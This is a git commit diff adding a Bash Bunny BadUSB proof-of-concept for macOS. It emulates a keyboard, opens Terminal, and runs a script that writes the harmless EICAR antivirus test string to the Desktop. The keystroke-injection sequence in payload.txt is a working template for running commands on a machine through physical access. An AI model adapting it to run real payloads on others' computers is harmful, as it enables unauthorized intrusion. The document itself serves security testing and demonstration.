Simple MacOS EICAR PoC Payload (#350)

* Add files via upload * Add files via upload Co-authored-by: Ciph3rtxt <30738667+Ciph3rtxt@users.noreply.github.com>
2025-10-29 16:58:25 +00:00 · 2022-02-14 21:40:59 -05:00 · 2022-02-14 21:40:59 -05:00 · a5d11747cf
commit a5d11747cf
parent 3184c229c7
3 changed files with 53 additions and 0 deletions
--- a/payloads/library/poc/MacOS_EICAR/eicar.sh
+++ b/payloads/library/poc/MacOS_EICAR/eicar.sh
@ -0,0 +1,2 @@
+#!/bin/bash
+echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt
--- a/payloads/library/poc/MacOS_EICAR/payload.txt
+++ b/payloads/library/poc/MacOS_EICAR/payload.txt
@ -0,0 +1,32 @@
+#!/bin/bash
+# Title:  MacOS_EICAR
+# Description:  Bad USB PoC for MacOS.    	
+# Author:  Ciph3rtxt	
+# Category:  PoC 	
+# Target:  MacOS 		
+# Attackmodes: 	HID STORAGE
+
+# Setup
+LED R
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+path=/Volumes/BashBunny/payloads/$SWITCH_POSITION
+
+
+# Execute Attack
+LED R
+DELAY 200
+RUN OSX terminal
+Q DELAY 2000
+Q STRING cd
+Q ENTER
+Q DELAY 200
+Q STRING chmod a+x $path/eicar.sh
+Q ENTER
+Q DELAY 200
+Q STRING $path/eicar.sh
+Q ENTER
+Q DELAY 200
+
+# Complete
+LED G
--- a/payloads/library/poc/MacOS_EICAR/readme.md
+++ b/payloads/library/poc/MacOS_EICAR/readme.md
@ -0,0 +1,19 @@
+# MacOS EICAR PoC
+
+Author: Ciph3rtxt
+
+
+## Category: 
+
+PoC
+
+## Description:
+
+Generates EICAR file to simulate USB (physical access) malware attack.
+
+## Status:
+
+|LED|STATUS|
+|-|-|
+|Red|Attack|
+|Green|Complete|